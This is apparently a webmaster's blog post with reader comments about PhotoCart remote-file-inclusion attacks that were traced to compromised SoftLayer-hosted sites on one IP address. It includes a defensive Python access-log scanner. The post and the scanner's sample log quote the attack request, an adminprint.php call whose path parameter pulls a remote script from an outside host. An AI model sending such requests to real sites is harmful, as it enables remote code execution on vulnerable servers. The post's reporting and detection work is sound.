The latest wave of PhotoCart vulnerability attacks just claimed a new website.
This time they claimed Husnaweb.com, someone's blog, as a victim.
I first notified the owner of Husnaweb and the data center Softlayer of the problem on 12/20. They promptly removed the file http://www.husnaweb.com/c.in from the server and the PhotoCart attacks stopped for a couple of days. Then the attacks started up again when the file showed up on the server again, so apparently Husnaweb was still vulnerable itself and being actively exploited.
I wrote back to the site owner and Softlayer again on 12/25 assuming they would deal with it eventually, being it was a holiday, and today noticed they appear to have simply given up on the blog as Husnaweb is gone and it's now a parked page on GoDaddy.
Today the attacks started up all over again using this page request:
"GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar?"
host empzone.com has address 208.101.16.120
Looks like empzone.com will be their next victim, so I'm notifying data center Softlayer yet again that another Softlayer customer has been breached.
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net
whois 208.101.16.120
OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
NetRange: 208.101.0.0 - 208.101.63.255
Anyone notice a trend here?
The other site I reported about, wnydir.com, was also a Softlayer customer.
host wnydir.com has address 208.101.16.120
The reverse DNS on the sites all points to baserunner.net, which says "Coming Soon", no contact information.
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net
I must be getting slow in my old age: they're all on the same IP address, so it would appear that the server has been compromised.
Ah well, this makes my next letter to Softlayer a little different now doesn't it?
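The request line quoted above carries the classic remote-file-inclusion fingerprint: a query parameter whose value is an absolute URL pointing at a third-party host. As an added example that is not part of the original post, this Python script scans access log lines (assumed to be in Apache combined format) for that pattern, reports which script and parameter were hit and which remote host the payload is pulled from, and collects the distinct hosts to report to the hosting provider; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the web server writes Apache combined-format access logs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def rfi_indicators(target):
    """Return (param, remote_host) for each query parameter whose value is an
    absolute http(s) URL, which is how a PHP include() is pointed at a remote file."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.strip()          # parse_qsl already URL-decodes the value
        if re.match(r'^https?://', value, re.IGNORECASE):
            hits.append((name, urlsplit(value).hostname or ''))
    return hits

def scan_access_log(lines):
    """Return one finding per request that carries an RFI indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                   # not a parseable combined-format line
        for param, host in rfi_indicators(m['target']):
            findings.append({'client': m['client'], 'time': m['time'],
                             'script': urlsplit(m['target']).path,
                             'param': param, 'remote_host': host,
                             'status': int(m['status'])})
    return findings

def remote_hosts(findings):
    """Distinct hosts serving the payload: the list to send to the hosting provider."""
    return sorted({f['remote_host'] for f in findings})

# Constructed sample log (not from the post); the first request line is the one the
# post quotes, client addresses are RFC 5737 documentation space, dates are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2007:10:15:02 -0500] "GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar? HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
203.0.113.9 - - [26/Dec/2007:10:15:07 -0500] "GET /PhotoCart/index.php?cat=3 HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Dec/2007:10:16:40 -0500] "GET /PhotoCart/adminprint.php?path=https%3A%2F%2Fexample.net%2Fc.in HTTP/1.1" 404 310 "-" "Mozilla/4.0"
"""

if __name__ == '__main__':
    found = scan_access_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['time']} {f['client']} -> {f['script']} param={f['param']} "
              f"fetches from {f['remote_host']} (HTTP {f['status']})")
    print("hosts to report/block:", ", ".join(remote_hosts(found)))
```

A 200 on such a request, as in the first sample line, is the worrying case: the include may have succeeded, and the box should be treated as compromised rather than merely probed.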
Yes, I have and I'm the owner of BaseRunner ...
I will be in touch for more info in the near future ...
Well, I am going to block baserunner until this is fixed.
deny from .baserunner.net
+ ip-range
Actually, its Baserunner that is initiating the critical action here.
Softlayer is a datacenter and is helping us by responding to our request in this case.
FWIW, I'm very pleased with softlayer's support as they are doing everything they can to fix this ASAP.
But make no mistake, the exploits would have continued if we didn't request action on the server.
Both Softlayer and Baserunner were very responsive in this matter.
After I figured out it was more than just a single account that was compromised, action was very swift.
Thanks again to baserunner and Softlayer.
Now, the fun part, shutting down the botnet that's mounting the attack.
Awesome ... great to hear.